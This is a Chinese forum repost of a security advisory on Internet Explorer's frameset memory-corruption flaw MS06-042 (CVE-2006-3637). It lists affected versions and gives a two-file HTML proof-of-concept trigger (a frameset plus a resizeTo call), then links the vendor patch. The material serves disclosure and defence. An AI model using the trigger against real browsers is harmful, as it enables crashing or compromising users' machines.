发新话题
打印

[转载]Microsoft IE Frameset内存破坏漏洞(MS06-042)

[转载]Microsoft IE Frameset内存破坏漏洞(MS06-042)

信息来源:绿盟科技

发布日期:2006-06-05
更新日期:2006-08-15

受影响系统:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 18277
CVE(CAN) ID: CVE-2006-3637

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

IE处理特制的HTML布局组件组合时存在内存破坏漏洞,远程攻击者可以通过诱骗用户访问恶意的WEB页面导致执行任意代码。

<*来源:Kil13r (http://www.kil13r.info/
  
  链接:http://marc.theaimsgroup.com/?l= ... 53834924300&w=2
      http://www.us-cert.gov/cas/techalerts/TA06-220A.html
      http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1) exploit_1.html
<frameset cols="0%, *">
<frame src="exploit_2.html">
</frameset>

2) exploit_2.html
<script>
self.resizeTo(2003, 1228);
</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS06-042)以及相应补丁:
MS06-042:Cumulative Security Update for Internet Explorer (918899)
链接:http://www.microsoft.com/technet/security/bulletin/ms06-042.mspx

TOP

发新话题